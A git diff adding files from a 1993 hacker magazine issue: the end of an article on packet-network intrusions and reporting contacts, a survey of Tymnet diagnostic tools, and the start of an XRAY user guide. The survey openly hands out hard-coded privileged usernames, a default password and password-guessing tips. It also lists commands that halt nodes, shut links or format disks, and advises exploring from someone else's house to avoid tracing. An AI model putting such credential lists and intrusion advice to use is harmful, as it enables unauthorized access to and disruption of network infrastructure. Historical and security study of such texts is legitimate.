+were soon writing software to intercept data and emulate
+hosts and capture login names and passwords from unsuspecting
+network users.  Hackers were intercepting thousands of calls
+every day from users connecting to systems ranging from
+banking and credit to the Fortune 500 to government sites.
+
+After nearly two years of "PAD to PAD" Sprintnet became
+alerted to the crisis and disallowed all connections to
+public PADs.  When Sprintnet expanded its service overseas
+they once again left access to the overseas PADs
+unrestricted.  The problem went unnoticed again until
+their attention was brought to it by a hacker who called
+Sprintnet security and told them that they ought to fix it
+quickly before it became as wide-spread as before.
+The problem was resolved much quicker this time.
+
+This particular technique was not limited to Sprintnet.  All
+networks using the Telenet software are at risk to this type
+of manipulation.  This type of network manipulation was
+integral in the recent compromise of a large Bell Company's packet
+network in a much-publicized case.  Certain foreign
+networks in countries such as Israel, England, Chile, Panama,
+Peru and Brazil are also at risk.
+
+EXAMPLE TWO
+
+In the late 1980's hackers stumbled onto a packet network
+owned and maintained by a large facilities maintenance
+company.  This particular network had a huge flaw in its
+setup.  It connected all calls placed through it as if they
+were placed with an NUI.  This allowed hackers to place calls
+to addresses that refused collect connections on networks
+around the world.  This became a popular method for hackers
+to access underground chat systems in Europe.  Additionally,
+this network contained a score of computers belonging to a
+major automobile manufacturer.  Most of these systems were
+highly insecure.  The network also allowed unrestricted
+access to network debug ports.  This particular network also
+had a toll-free number on an MCI exchange.  At the time, MCI
+was having some difficulty getting their equipment to accept
+the ANI information to provide customers with a full call-
+detail report on their monthly statement.  The hackers were
+well aware of this fact and made frequent use of the network
+with no fear of prosecution.  Eventually MCI was able to fix
+their translation problem and were able to provide their
+clients with full call-detail reports.  When this was
+learned, many hackers abandoned use of the network, but
+several others were later prosecuted for its usage when their
+number turned up on the bill.
+
+EXAMPLE THREE
+
+Until quite recently intimate knowledge of the utilities
+driving various packet-switched networks were known by an
+exclusive few.  While investigating a network owned by an
+extremely large Cleveland-based conglomerate hackers came
+across a system where documentation on the usage of every
+utility was kept online.  The hackers quickly downloaded all
+the information and it soon became somewhat wide-spread among
+the underground community.  With less-skilled and more
+unscrupulous individuals in possession of this information
+many networks began experiencing disruptions and system
+integrity was quickly lost as hackers began monitoring data
+traffic.
+
+No information on the usage of packet networks or their
+utilities should ever be kept online.  Hard copies should be
+kept in the possession of the network administrator, and when
+updated, obsolete versions must be destroyed.
+
+WHAT TO DO
+
+When a security violation stemming from a connection through
+the packet network is noticed, Network Security should be
+notified.  Clients of BT-Tymnet should notify Steve Matthews
+at 408-922-7384.  Clients of Sprintnet should notify
+Pat Sisson at 703-689-6913.
+
+Once changes have been enacted in the network to prevent
+further break-ins, the host computer should be checked
+thoroughly for any changes or damages, and all individual
+account passwords should be changed.
+
+CONCLUSION
+
+It is critical that the packet network be configured properly
+and that all measures are taken to ensure its security.  Even
+the most secure host computer can be easily compromised if it
+is connected to an insecure packet network.
+----------------------------------------------------------------------
diff --git a/phrack42/5.txt b/phrack42/5.txt
new file mode 100644
index 0000000..2f26998
--- /dev/null
+++ b/phrack42/5.txt
@@ -0,0 +1,716 @@
+                             ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Two, File 5 of 14
+
+= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
+
+                    Synopsis of Tymnet's Diagnostic Tools
+                             and their associated
+                   License Levels and Hard-Coded Usernames
+
+                                    by
+                              Professor Falken
+
+                             February 14, 1993
+
+= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
+
+
+   While the scope of this article is general, the information contained
+within is NOT for the novice Tymnet explorer.  Novice or NOT, go ahead
+and read; however, caution should be taken when invoking any of these
+commands upon BT's network.  Execution of certain commands can have
+debilitating consequences upon segments of the network.
+
+   In this article I intend to educate the reader about the various
+Tymnet diagnostic utilities that are available.  This article is by no
+means an in depth microscopic view of the utilities; but rather a brief to
+the point survey course of what is available to qualified people.  With
+each utility I will describe its use/s, list its major commands, and
+in DDT & XRAY's case, dispense its hard-coded usernames which allow you to
+become a 'qualified person.'
+
+   It seems the software engineers at Tymnet (for the lack of something
+better to do) like to rename ordinary words to complicated ones.  For
+instance, within this article I will talk about LICENSE LEVELS.  License
+levels are nothing more than security levels.  When I speak of License
+Level 4, just translate that to Security Level 4.  I would have just called
+everything security levels, but I wanted to stay within that lethargic
+Tymnet mood for realism purposes.  Another word the engineers pirated from
+'GI JOE' was GOOD-GUYS.  In our world, a Good-Guy is a valid username that
+can be used for logging into the various diagnostic utilities.
+
+   Like most conventional computers, Tymnet also needs an operating system
+for its code to run under.  Tymnet's node-level, *multitasking*, operating
+system is called ISIS; it stands for 'Internally Switched Interface System.'
+Its designed for: handling multiple communication links, allocating system
+memory, system job/process scheduling, and all the other BASIC things ALL
+operating systems do.  Tymnet explains it a bit more complicated and less
+to the point, but to give equal time to the opposing viewpoint, this is
+what they say:
+
+   "Internally Switched Interface System. The operating system for a TYMNET
+    node; provides functions that control the overall operation of an
+    Engine.  These functions include, but are not limited to, memory
+    allocation, message switching, job scheduling, interrupt processing,
+    and I/O distribution. ISIS allows multiple data communications
+    functions to run on a single processor.  Two of its many services are
+    debugging and I/O port management. Formerly known as ISIS-II or ISIS2.
+    ISIS2, ISIS-II  Obsolete terms. See Internally Switched Interface
+    System (ISIS)."
+
+   At various points within this file I will refer to an ENGINE.
+Basically, an ENGINE is a minicomputer which handles all the processing
+requirements that ISIS and its applications demand.  However, to be fair to
+all the Tymnet technoids, this is what BT says:
+
+   "BT North America packet-handling hardware. The Engine communications
+    processor is a member of a family of special-purpose minicomputers.
+    It runs communications software such as Node Code (for switching),
+    slot code (for protocol conversion and value-added functions), and
+    the ISIS operating system. The Engine family consists of the
+    Pico-Engine, Micro-Engine, Mini-Engine, Mini-Engine-XL,
+    Dual-Mini-Engine-XL, Engine, and ATC."
+
+   You think they would have invented much NEATER names for their computer
+platforms than 'Mini-Engine' or 'Micro-Engine'.  I would guess that BT's
+hardware engineers have less time than the software engineers to invent
+K-RAD names for their projects.  Anyhow, as you can see, the ENGINE is the
+muscle behind Tymnet's network brawn.
+
+   Another term which is very basic to ANY understanding of Tymnet is the
+'SUPERVISOR.'  As you can see the engineers searched high & low for this
+clever term.  The Supervisor is many things including, the authentication
+kernel you interact with, the circuit billing system that subscribers
+unfortunately do not interact with, and generally the network's 'BIG BROTHER.'
+Supervisor watches the status of the network at all times, keeping detailed
+logs and interceding when trouble erupts.  The supervisor term can also
+refer to the engine upon which the Supervisor is being run on.
+
+   With all that in mind, I will now introduce five of Tymnet's diagnostic
+tools.  I intend on presenting them in this order: DDT, MUX, PROBE, LOAD-II,
+TOM, and XRAY.  Please note that only DDT and XRAY have 'good-guy' lists
+provided.
+
+DDT - Dynamic Debugging Tool
+----------------------------
+
+   DDT is a utility which runs under the ISIS operating system.  DDT is
+capable of loading or displaying a slot's content.  A slot is an area of
+memory in a node in which Tymnet applications run.  DDT can also be used
+for modification of a specific slot's slot code.  Slot code is any
+program which has been assigned memory within the engine by ISIS.  DDT also
+performs other lower level diagnostic functions, which I will not go into.
+
+   Logging into DDT requires you to provide the 'please log in:' prompt
+a valid username and password.  Upon checking the good-guy list and
+authenticating the user, the kernel process searches for the associated
+slot assignment.  If no slot is assigned to the good-guy, the kernel will
+prompt you for a slot number.  Once you enter a VALID slot number and it is
+available, the authentication kernel executes the DDT utility.  When I say
+'VALID' slot number, I mean a slot number which logically exists AND is
+attainable by your current good-guy's license level.
+
+   Actual logins to DDT take the form:
+
+   please log in: goodguyID:host# <cr>
+        password:
+
+Where goodguyID is a valid goodguy, host# is the Tymnet subscriber who
+needs a little 'work' done, and obviously the password is what it is.  While
+I would like to give you all the passwords I could, I don't think it is
+going to happen.  So all I can do is suggest trying different variations
+of the goodguy IDs, and other dumb passwords unsecure people use.
+
+   Connection to primary DDT is displayed as the ever-so-friendly '*' prompt.
+It is from this prompt that all general DDT commands are directed.  The most
+useful DDT commands are listed below in a general, extended, and RJE/3270T
+specific registry.
+
+
+GENERAL DDT COMMANDS
+--------------------
+
+E            Execute a slot.
+H            Halt a slot. <---- DESTRUCTIVE See WARNING!
+ZZ           Logs you out of DDT.
+^#           Transfers control from the current slot to the slot
+             specified by #. (IE- ^7  Switches control to slot 7)
+?CPU         Displays CPU utilization (Engine Performance)
+?HIST        Displays a history of diagnostic messages.
+?HOST        Displays the hosts in use by that slot.
+?LU          Displays the logical unit to physical device assignment.
+?MEM         Displays the time of memory errors if any.
+?STAT        Allows the execution of EXTENDED DDT.  To obtain the extended
+             command prompt type '/'.Command prompt ':>'
+?VERN        Displays the ISIS version followed by the SLOT's version.
+
+
+WARNING!: It is possible to HALT a slot accidently.  This will freeze
+          everything going in/out of the current slot.  This can be BAD
+          for customer satisfaction reasons.  If you accidently hit 'H',
+          even without a CR/LF it will hang the slot.  So when the ?HIST or
+          ?HOST commands are used make SURE you type that important '?'
+          beforehand.  This will halt everything going over that slot,
+          effectively destroying the communication link.
+
+
+EXTENDED COMMANDS FOR RJE & 3270T
+---------------------------------
+
+RJE & 3270T
+===========
+EXI          Logs you out. (DuH!)
+QUIT         Return from extended DDT prompt ':>' to normal '*' DDT prompt.
+
+RJE Only
+========
+HELP         Displays a list of commands available in extended RJE DDT mode.
+             (A list not worth putting in here.)
+SCOPE        Outputs a protocol trace.
+TRACE        Outputs a state trace.
+
+3270T Only
+==========
+HELP         Displays a list of commands available in extended 3270T DDT mode.
+             (Again, a list not worth putting in here.)
+STATUS       Displays status of all lines, control units, and devices.
+STRTLN x     Start polling on line x. (Performance benchmark)
+STRTCU x,y   Start polling control UNIT x on LINE y. (Performance benchmark)
+STOPLN x     Stop polling on line 'x'
+STOPCU x,y   Stop polling control UNIT x on LINE y.
+
+NOTE:If you try to use an RJE command while logged into a 3270T you will
+     be shown the incredible "ILLEGAL COMMAND" string.
+
+
+GOOD-GUYS AND LICENSE LEVELS
+----------------------------
+
+   As with any username, there is an accompanying license level (security
+level) with each account.  The different levels define which types of
+slots that username may access and the available commands.  Some of the
+good-guys have access to all slots including supervisor, while others
+have access to only non-supervisor slots.
+
+   The table below is a list of the actions that are available with the
+various different license levels.
+
+L.DISC    Permits disk formatting
+L.H       Permits the halting, loading, and restarting of all slots for
+          code-loading purposes.
+L.P       Permits the halting, restarting, and online software modification
+          to an active slot. (Except slots 0 and FF)
+L.R       Permits logon to all slots (Except 0 and FF)
+L.SOA     Permits logon to a node's slot 0. (Node configuration.)
+L.SOP     Permits the halting, restarting, and online software modification
+          to slot 0.
+L.SOR     Permits the reading of slot 0 files.
+L.SUA     Permits logon to Supervisor slots.
+L.SYA     Permits logon to a node's FF slot. (ISIS configuration node.)
+L.SYR     Permits the reading of slot FF files.
+L.SYP     Permits the halting, restarting, and online modification to
+          slot FF.
+
+   The DDT license levels are numbered from 0 to 4, 4 being Gh0D.  Each level
+has several of the above named actions available to them.  Listed below are
+the various actions available at the 0 through 4 license levels.
+
+LEVEL   ACTIONS
+=====   =======
+  4     L.DISC, L.P, L.SOA, L.SOP, L.SUA, L.SYA, and L.SYP .
+        (Disk format, halt, restart, online software mods, and reading
+         of files for all slots AND supervisors. Like I said, GOD.)
+
+  3     L.P, L.SOA, L.SOP, L.SYA, and L.SYP .
+        (Halt, restart, online software mods, and reading of files for
+         all slots and supervisors.)
+
+  2     L.H, L.R, L.SOA, L.SOR (For code loading purposes: halt, restart
+        online software mods, and reading files for all slots and
+        supervisor nodes.)
+
+  1     L.R, L.SOA, L.SYA (Views ALL slots and supervisor nodes)
+
+  0     L.R (Views all slots, EXCEPT supervisor slots and 0 & FF.)
+
+   What follows is a good-guy userlist with the associated license level
+of that username.  I also note whether the account is ACTIVE/PASSIVE upon
+an operating node/slot combination and the seriousness of the network
+impact that those associated licenses can possibly create.
+
+      LICENSE LEVEL    GOOD GUY USERNAME     ACTIVE/PASSIVE  NETWORK IMPACT
+      =============    =================     ==============  ==============
+            4             ISISTECH               Active           MAJOR
+            4             NGROM                  Active           MAJOR
+            4             NSSC                   Active           MAJOR
+            4             RPROBE                 Active           MAJOR
+            4             RERLOG                 Active           MAJOR
+            4             RACCOUNT               Active           MAJOR
+            4             RSYSMSG                Active           MAJOR
+            4             RUN2                   Active           MAJOR
+            4             TNSCM                  Active           MAJOR
+
+            3             IEXP                   Active         Moderate
+            3             ISERV1                 Active         Moderate
+            3             ISERV2                 Active         Moderate
+            3             ISERV3                 Active         Moderate
+            3             ITECH1                 Active         Moderate
+            3             ITECH2                 Active         Moderate
+            3             ITECH3                 Active         Moderate
+            3             ITECH4                 Active         Moderate
+            3             ITECH5                 Active         Moderate
+
+            2             GATEWAY                Active           Minor
+
+            1             DDT                    Passive
+            1             DDTECH                 Passive
+            1             IOPPS                  Passive
+            1             ISERV                  Passive
+            1             ITECH                  Passive
+
+            0             VADICBUSY              Passive
+
+
+MUX - The Circuit Multiplexer
+-----------------------------
+
+   MUX is a tool which also runs within an ISIS slot.  MUX allows the
+building, interconnecting, and controlling of several sets of circuits from
+a single terminal.  Instead of logging in and out of each diagnostic
+tool as different commands are needed, MUX is used to create multiple
+concurrent circuits.  Once these are set up, it is easy to switch back
+and forth between different diagnostic applications, WITHOUT having to
+logoff one before logging into another.  Tymnet also likes to boast that
+you can chat with other users on MUX's 'Talk mode facility.'  I'll stick
+to IRC until this catches on.
+
+   Logging into MUX is quite simple.  It takes the form of:
+
+   please log in: userid <cr>
+        password:
+
+NOTE: ATTN commands, see CHAR command.
+ATTN ATTN       Allows you to send one attention character down the circuit.
+ATTN C x        Labels the current port, where 'x' is the label you desire.
+ATTN E          Allows you to switch to the next port you have defined.
+                This command however is not valid from the command mode.
+                The circuit label is presented and connection is made.
+                Even though the prompt for that circuit is not presented,
+                you ARE connected.
+ATTN Z          Returns you to the command mode.
+
+CHAR char       Configures your ATTN character to 'char'.  So in the below
+                ATTN commands, you will have to enter your ATTN character
+                then the proceeding character.  The default ATTN Character
+                is CTRL-B.  Personally, I like to set mine to '!'.
+CONNECT pl1,pl2 Connect the output of port label-1 to port label-2.
+                Usually your current port label is marked with a * preceding
+                it in a 'LIST', this is also known as a BOSS.
+
+ENABLE pl       Enables a pl's (port labels) output.
+EXIT            Leave MUX with all your circuits INTACT.
+
+FLUSH pl        Flush pl's (port labels) output.
+FREEZE N/F      Freeze (N=ON or F=OFF) current Boss.
+
+GREETING msg    Sets up the greeting message.
+
+HEAR N/F        Allow (N=ON or F=OFF) users to 'TALK' to each other.
+HELP            Prints help messages. (ooof)
+
+LIST            Lists all active ports for the current user. (ATTN Z L)
+LABEL N/F       Labeling (N=ON or F=OFF) of all output sent to the Boss.
+
+MAKE            Make a new circuit by logging onto a diagnostic tool.
+                You will be prompted with the omnipresent 'Please log in:'
+                prompt.  Just login as usual for particular tool.
+MESSAGE         Print last message.
+
+QUIT            Leave MUX and ZAP all circuits created.
+
+SEND pl         Send to pl (port label).
+
+TALK username   Talks to 'username' providing HEAR=N.
+TIME            Outputs date and time in format: 31Dec93 05:24
+TRANSFER pl     Transfers control of this BOSS to pl (port label).
+
+ZAP pl          Zap any circuits you made, where 'pl' is the port label.
+                This command defaults to the port labeled '*' (Boss).
+                This command is ONLY valid in command mode.
+
+PROBE
+-----
+
+   PROBE is probably one of the BEST known Tymnet diagnostic tools.
+PROBE is actually a sub-program of the Supervisor.  PROBE is capable of
+monitoring the network, and it has access to current pictures of
+network topology, including host tables and node descriptors.  PROBE
+shares common memory with the Supervisor and has circuit tracing
+capability.  PROBE can be used to check the history of nodes & links,
+boot a node, trace a circuit, and reset a link or shut one down.
+PROBE can be access directly or through TMCS (Tymnet Monitoring
+and Control System.)
+
+   To access PROBE from within TMCS you would enter the command:
+
+PROBE s    Where 's' is the active or 'sleeping' supervisor.
+
+For more PROBE related TMCS commands or general TMCS commands, please
+refer to an appropriate source.  If the demand is great enough, perhaps I
+will release a TMCS reference sheet in the future.
+
+   PROBE access is determined by the sum of the individual license
+levels granted to the user.  PROBE licenses are as follows:
+
+License    Description
+-------    -----------
+  00       Permits view only commands -- user is automatically logged off
+           from PROBE after 20 minutes of no activity.
+  04       Permits view only commands -- no automatic logoff.
+  20       Permits all 00 commands plus ability to effect changes to
+           network links.
+  10       Permits ability to effect changes to node status.
+  01       Permits ability to effect changes to network supervisors.
+  02       Permits ability to effect changes to supervisor disks.
+
+   I do not have any hardcoded usernames for PROBE with this exception.
+The PROBE access username 'PROBE' is hardcoded into the supervisor,
+and usually each host has one hardcoded PROBE username: CONTROL -- license
+level 37.  So in comparison with the above chart, CONTROL has Gh0d access
+to PROBE commands, because everything added up equals 37 (duh).  On many
+subnets, the username RPROBE has similar access.
+
+PROBE COMMANDS
+
+Command      Lic. Lvl  Description
+-------      --------  -----------
+CHANGE        00/04    Changes your PROBE personal password.
+EXI           00/04    Logout.
+HELP          00/04    Help. (Temple of Sub-Genius)
+SEND x text   00/04    Sends message to Probe user whose job label is 'x'.
+VERSION       00/04    Lists current software version number.
+WHO           00/04    Lists currently logged in PROBE users. (Useful)
+
+DISPLAY CMDS:
+Command     Lic. Lvl  Description
+-------     --------  -----------
+ACCT         00/04    Displays # of accounting blocks on Supervisor disk
+                      available for RAM session record data.
+AN           00/04    Displays detailed information about active nodes.
+ASTAT        00/04    Displays number of login and circuit building
+                      timeouts.
+
+AU           00/04    Displays node numbers of ALL active nodes that are up.
+CHAN x       00/04    Displays port number used by Supervisor for command
+                      circuit to node 'x'.
+COST x       00/04    Displays cost of building command circuit to node 'x'.
+CSTAT        00/04    Displays time, login, rate, and network status every
+                      15 seconds.
+EXC O|S|P    00/04    Displays links that are overloaded (O), or shut (S),
+                      or out of passthroughs (P).
+HOST x       00/04    Displays information about host 'x' or all hosts.
+LACCT        00/04    Displays number of last accounting block collected
+                      by RAM session record data.
+LRATE        00/04    Displays Supervisor login rate in logins per min.
+LSHUT        00/04    Displays shut links table.
+LSTMIN       00/04    Displays circuit status information gathered by
+                      Supervisor during preceding minute.
+N x          00/04    Displays status info about node 'x'.
+OV x         00/04    Displays overloaded links.
+PERDAT       00/04    Displays Supervisor performance data for preceding min.
+RTIME        00/04    Reads 'Super Clock' time and displays year, and
+                      Julian date/time.
+STAT         00/04    Displays network status information.
+SYS          00/04    Displays host number running PROBE.
+TIME         00/04    Displays Julian date and network time.
+TSTAT        00/04    Displays same information as STAT, preceded by
+                      Julian date/time.
+VERSION      00/04    Displays current versions of PROBE and Supervisor
+                      software.
+WHO          00/04    Displays active PROBE users and their job labels.
+
+LOG MESSAGE CMDS:
+Command          Lic. Lvl  Description
+-------          --------  -----------
+LOG               00/04    Outputs network information from Supervisor log.
+REPORT            00/04    Controls output of node reports.
+RLOG m1..m4       00/04    Restricts log output to up to four message numbers.
+                           M1- 1st Message, M2- 2nd Message, etc.
+RNODE n1 n2       00/04    Restricts log output to messages generated at nodes
+                           N1 and N2.
+
+NETWORK LINK CMDS:
+Command         Lic. Lvl  Description
+-------         --------  -----------
+CSTREQ n1 n2       20     Requests total speed of all lines on specified
+                          link. (n1= 1st Node n2= 2nd Node)
+ESHUT n1 n2        20     Shuts specified link and enters it on shut links
+                          table. (n1= 1st Node n2= 2nd Node)
+PSTAT n Hhost p    20     For node 'n', displays status of logical ports
+                          for port array 'p' on 'host'. Note the capital
+                          'H' must precede the host specific.
+RSHUT n1 n2        20     Opens specified link and removes it from shut
+                          links table.
+SYNPRT n           20     Displays status of async ports on node 'n'.
+TRACE n Hhost p    20     Traces specified circuit. Where 'n' is node,
+  or  n Sp         20     'host' is HOST, and 'p' is port.  Or for secondary
+                          command: 'n' node name, 'p' port. Again, 'S' must
+                          precede the port name.
+T2BORI n1 n2       20     Resets communication channel between node n1 and
+                          node n2.
+
+NETWORK NODE CMDS:
+Command  Lic. Lvl  Description
+-------  --------  -----------
+CLEAR n     10     Opens all links on node 'n'.
+DLOAD n     10     Causes node 'n' to execute its downline load
+                   bootstrap program.
+NSHUT n     10     Shuts all links on node 'n'.
+RETAKE n    10     Causes Supervisor to release and retake control
+                   of node 'n'.
+SPY         10     Displays last 32 executions of selected commands.
+
+NETWORK SUPERVISOR CMDS:
+Command  Lic. Lvl  Description
+-------  --------  -----------
+AWAKE       01     Wakes a sleeping Supervisor. (Only one Supervisor is
+                   active at one time, however there can be supervisors
+                   'sleeping'.)
+CLASS       01     Causes Supervisor to read Netval class and group
+                   definitions.
+DF s        01     Increases Supervisor's drowsiness factor by 's' seconds.
+ETIME       01     Sets time known to Supervisor.
+FREEZE      01     Removes Supervisor from network.
+PSWD        01     Displays password cipher in hex.
+SLEEP       01     Puts active Supervisor to sleep.
+THAW        01     Initializing frozen Supervisor.
+TWAKE       01     Wakes sleeping Supervisor, automatically puts active
+                   Supervisor to sleep and executes a CSTAT command.
+
+USER UTILITY CMDS:
+Command  Lic. Lvl  Description
+-------  --------  -----------
+ENTER       01     Adds/deletes/modifies Probe usernames.
+HANG x      01     Logs off user with job label 'x'.
+LIST        01     Displays Probe usernames.
+ULOGA       20     Enters user-generated alphabetic message in msg log.
+ULOGH       20     Enters user-generated hex message in msg log.
+
+SYSTEM MAINTENANCE / DISASTER RECOVERY CMDS:
+Command       Lic. Lvl  Description
+-------       --------  -----------
+DCENT n1 n2      02     Allows Tymnet support temporary, controlled access
+                        to a private network. (Useful)
+DCREAD           02     Reads current value of password cipher associated
+                        with DCENT username.
+FTIME +/- s      02     Corrects the 'Super Clock' by adding (+) or
+                        subtracting (-) 's' seconds from it.
+INITA            02     Initializes accounting file to all zeros.
+INITL            02     Initializes log to all zeros.
+
+
+NOTE:  Each PROBE is a separate entity with its own files.  For example,
+       if you shut lines in the PROBE on the active Supervisor, this will
+       NOT be known to the sleeping PROBE.  If another Supervisor takes
+       over the network, it will not consider the link to be shut.
+       Likewise, PROBE password changes are made only to one PROBE at a
+       time.  To change your password everywhere, you must do a CHANGE in
+       each probe.
+
+LOAD-II
+-------
+
+   LOAD-II is probably one of the LEAST known of Tymnet's utilities.
+LOAD-II is used to load or dump a binary image of executable code for a
+node or slot.  The load/dump operation can be used for the ENTIRE engine,
+or a specific slot.
+
+Upon reaching the command prompt you should enter:
+
+   R LOADII <cr>
+
+This will initiate an interactive session between you and the LOAD-II
+load/dumping process.  The system will go through the following procedure:
+
+TYMNET OUTPUT         YOUR INPUT  WHAT THIS MEANS TO YOU
+-------------         ----------  ----------------------
+
+Enter Function:           G       'G' Simply means identify a gateway
+Enter Gateway Host:     ####      This is the 4 digit identifier for hosts
+                                  on the network.  I know that 2999 is for
+                                  'MIAMI'.
+Password:               LOAD      This is the default password for LOAD-II.
+Function:                 C       'C' for crash table dump, OR
+                          D       'D' to dump an entire engines contents, OR
+                          L       'L' to load an entire engines contents, OR
+                          S       'S' to load a slot, or
+                          U       'U' to dump a slot.
+Neighbor Node:          ####      Selects neighbor node number.
+Neigh. Kern. Host#:     ###       This 3-digit code is derived by adding the
+                                  first two digits of the node number and
+                                  appending the last two digits to that sum.
+Line # to Load From:    ##        Use the line number coming off the
+                                  neighbor node, NOT the node that is DOWN.
+Object File Name:                 File used to load/dump node or slot from/to.
+EXIT                    EXI       Send program to end of job.
+
+
+TOM - TYMCOM Operations Manager
+-------------------------------
+
+   TOM is utility which runs under TYMCOM.  Quickly, TYMCOM is an interface
+program for the host computer which imitates multiple terminals.  Quoting
+from Tymnet, "TYMCOM has multiple async lines running to the
+front-end processor of the host."  So in other words, TYMCOM has a
+bunch of lines tied into the engine's front-end, allowing a boatload of
+jobs/users to access it.
+
+   TOM is primarily used with TYMCOM dialup ports.  It is used to DOWN and
+then UP hung ports.  This type of situation may occur after a host crash
+where users are getting a 'Host Not Available' error message.  TOM can also
+be used to put messages on TYMCOM in order to alert users to problems or
+when scheduled maintenance will occur on various hosts/ports.  To login
+type:
+
+   ##TOM##:xxxx
+
+Where 'xxxx' is the appropriate host number you wish to 'work' on. After
+proper hostname is given, you will then be prompted for a password.  As I
+have none of these to give, play on 3-5 character combinations of the
+words: TYMCOM, TOM, HIF, OPMNGR.
+
+Command         Description
+-------         -----------
+GRAB TOMxxxx    This should be the FIRST thing you do when down/upping
+                a host.  Gets license for up or down host, then prompts for
+                password of host.  Where 'xxxx' is the host number.  You
+                must have privileged status to use.
+
+CHANGE xxxx     Change a host number to 'xxxx'.
+
+DIAGNOSTICS     Turns the diagnostic messages off or on.(Toggle)
+DOWN P xx       Take DOWN port number 'xx', or
+     H xxxx     Take DOWN host number 'xxxx'.
+
+ENQUIRE         Lists information about the node and slow where TYMCOM is
+                running.
+EXIT            Logout.
+
+MESSAGE         Sets text to be output to the terminal when a user logs in.
+
+SHUT H xxxx     Disallow new logins to a specified host = 'xxxx', or
+     P xx       Disallow new logins to a specified port = 'xx'.
+SPEED xxxx      Specifies the baud rate at which a port will communicate.
+STAT P xx-yy    Shows status of port numbers 'xx' through 'yy'.  Either
+                one or a number of ports may be specified.
+
+TIME            Displays the current time.
+TO x message    Sends 'message' to specified user number 'x'.
+
+UP P xx         Bring UP port number 'xx', or
+   H xxxx       Bring UP host number 'xxxx'.
+
+WHO             Lists user numbers of all users currently logged into TOM.
+
+
+XRAY
+----
+
+   XRAY is another one of the very well known commands.  XRAY is a program
+which sits within node code and waits for use.  Its used to gain
+information about a specific node's configuration and its current status in
+the network.  It can be used to determine the probable reason for a crash
+or line outage in order to isolate bottlenecks or track down network
+anomalies.
+
+   XRAY user licenses are all assigned a logon priority.  If every XRAY
+port on a node are in use, and a higher priority XRAY username logs in,
+the lowest priority username will be logged out.
+
+License Description
+------- -----------
+2       Permits the writing and running of disruptive node tests.
+1       Permits the running of non-disruptive node tests.
+0       Permits view only commands.
+
+   The following list is a compilation of some hardcoded 'good-guys'.
+
+LICENSE LEVEL  PRIORITY  GOOD GUY USERNAME  ACTIVE/PASSIVE  NETWORK IMPACT
+=============  ========  =================  ==============  ==============
+     2            98        XMNGR              Active           MAJOR
+     2            98        ISISTECX           Active           MAJOR
+
+     2            97        XNSSC              Active           MAJOR
+
+     1            50        TNSCMX             Active           Minor
+     1            50        TNSUKMX            Active           Minor
+
+     1            40        XSOFT              Active           Minor
+     1            40        XEXP               Active           Minor
+     1            40        XCOMM              Active           Minor
+     1            40        XSERV1             Active           Minor
+
+     0            50        XRTECH            Passive
+
+     0            30        XTECH             Passive
+     0            30        XOPPS             Passive
+     0            30        XSERV             Passive
+     0             0        XRAY              Passive
+
+   What follows is a VERY brief command summary.
+
+Command         Description
+-------         -----------
+CD              Displays current auto/display mode for CRYPTO messages.
+CD Y|N          Turns ON/OFF automatic display of CRYPTO messages.
+CL n            Display the last 'n' CRYPTO messages.
+CRTL Z          Logout.
+
+BT              Causes the SOLO machine to go into boot.  Audited command.
+
+DB              Used to build and measure link delay circuits between
+                nodes.  The DB command prompts for a node list. IE-
+                NODE LIST: <node #1 node#2 ... node#x>
+DD              Displays link measurement data for circuit built by the
+                DB command.  Verifies that the circuit has been built.
+DE              Used to terminate the DB command.
+
+HT              Puts the node code into a STOP state.  This command shows
+                up in audit logs.
+
+KD n            Display link descriptor parameters where 'n' is the
+                neighbor number.
+KS n            Display link performance statistics (link delay, packet-
+                making, bandwidth utilization, etc.)
+
+ND              Displays information about the configuration of a node
+                and its neighbors.
+NS option       Displays parameters for estimating node work load. Options:
+                -EXCT is the current load factor or execute count. A count
+                of less than 60 means the load is heavy.
+                -EXLW is the lowest EXCT value computed since startup.
+                -EXHW is the highest EXCT value computed.
+SN              Restarts the node, command audited.
+------------------------------------------------------------------------------
+
+   I hope this file gave you a better understanding of the Tymnet network.
+While a lot of the commands make sense only if you've had prior Tymnet
+experience, I hope my summaries of each tool gave you a little better
+understanding of the network.  I am available for questions/comments/gripes
+on IRC, or I can be reached via Internet mail at:
+
+                    pfalken@mindvox.phantom.com
+
+   Thanks goes out to an anonymous hippy for providing the extra nudge I needed
+to sit down and write this phile.  NO thanks goes out to my lousy ex-roommates
+who kicked me out in the middle of this article.  Their day is approaching.
+
+   Be careful everyone...and remember, if you have to explore the
+mysterious fone/computer networks, do it from someone else's house.
+
+- Professor Falken
+= Legion of Doom!
+
+
+<EOF-93> [Written with consent and cooperation of the Greys]
diff --git a/phrack42/6.txt b/phrack42/6.txt
new file mode 100644
index 0000000..b7bf9c7
--- /dev/null
+++ b/phrack42/6.txt
@@ -0,0 +1,327 @@
+                      ==Phrack Magazine==
+
+          Volume Four, Issue Forty-Two, File 6 of 14
+          
+ 
+                   A User's Guide to XRAY
+
+                         By  N.O.D.
+
+
+This file was made possible by a grant from a local
+McDonnell Douglas Field Service Office quite some 'tyme'
+ago.  This was originally written about version 4, although
+we are pretty sure that BT has now souped things up to version 6.
+Everything still seems the same with the exception of a few
+commands, one of which we will point out in particular.
+
+Any comments/corrections/additions/updates or subpoenas
+can be relayed to us through this magazine.
+
+XRAY is a monitoring utility that gives the user a real-time
+window into a Tymnet-II node.  Used in tandem with other
+utilities, XRAY can be a very powerful tool in monitoring network
+activity.
+
+In this file we will discuss key features of XRAY and give command
+formats for several commands.  Some commands are omitted from this
+file since they can only be used from dedicated terminals.  Several
+others are likewise omitted since they deal with the utilization of
+XRAY in network configuration and debugging the actual node code, and
+would probably be more damaging than useful, and commands to reset
+circuits and ports are similarly missing.
+
+
+ACCESS
+
+The most obvious way to access XRAY is to find the username/password
+pair that either corresponds to the host number of an XRAY port, or
+is otherwise in the goodguy list of a particular node.
+
+XRAY can also be accessed through the DDT utility by typing
+
+    ?STAT
+
+Either will respond with the following
+
+**X-RAY**  NODE:  XXX   HOST:  ZZZ  TIME:  DD:HH:MM:SS
+
+If all ports are currently in use the user will only be allowed access
+if his/her is of greater precedence in the goodguy list than that of
+someone previously online.  In such a case, that user will be forcibly
+logged out and will receive the following message:
+
+    "xray slot overridden"
+
+Otherwise the user will see:
+
+    "out of xray slots"
+
+XRAY users are limited in their power by the associated "licence" level
+given them in the XRAY goodguy list.  The levels are:
+
+    0 - normal
+    1 - privileged
